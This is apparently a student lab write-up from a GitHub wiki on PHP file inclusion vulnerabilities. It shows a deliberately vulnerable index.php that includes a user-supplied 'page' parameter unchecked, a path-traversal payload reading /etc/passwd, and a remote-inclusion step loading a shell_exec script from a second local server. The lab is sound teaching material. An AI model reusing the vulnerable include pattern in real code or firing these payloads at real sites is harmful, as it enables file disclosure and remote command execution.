Lab 2.2: File Inclusion Vulnerabilities - FlameSpyro/Tech-Journal GitHub Wiki
- To start off we needed to create a webpage for testing, this requires an additional page1-3.html files in order to work. The following code was provided:
<a href="index.php?page=page1.html"><button>page1</button></a><br/>
<a href="index.php?page=page2.html"><button>page2</button></a><br/>
<a href="index.php?page=page3.html"><button>page3</button></a><br/>
<?php
$page = $_GET['page'];
echo "<div>";
if(isset($page))
{
include("$page");
}
else
{
echo "<p>select a page</p>";
}
echo "</div";
?>
- To startup the server, we need to startup the server using
php -S 127.0.0.1:9000
- To show some password information we are gonna need to add an additional
?page=../../../../../../etc/passwdfor the following result:
- We can view the operating system by changing the passwd to os-version at the end
- The assignment also needs us to show we can inject a rfl.html script into the homepage. This can be done by creating the file with anything in it as I have button mashed and to start up another server under port 8000 instead. The URL tagged at the end is
- If we wanted to do a command injection we need to do a new script called rfi.php where we enter:
</php
echo shell_exec("cmd of choice");
?>
- Great! Now we just need to inject it into the url
?page=http://127.0.0.1:8000/rfi.php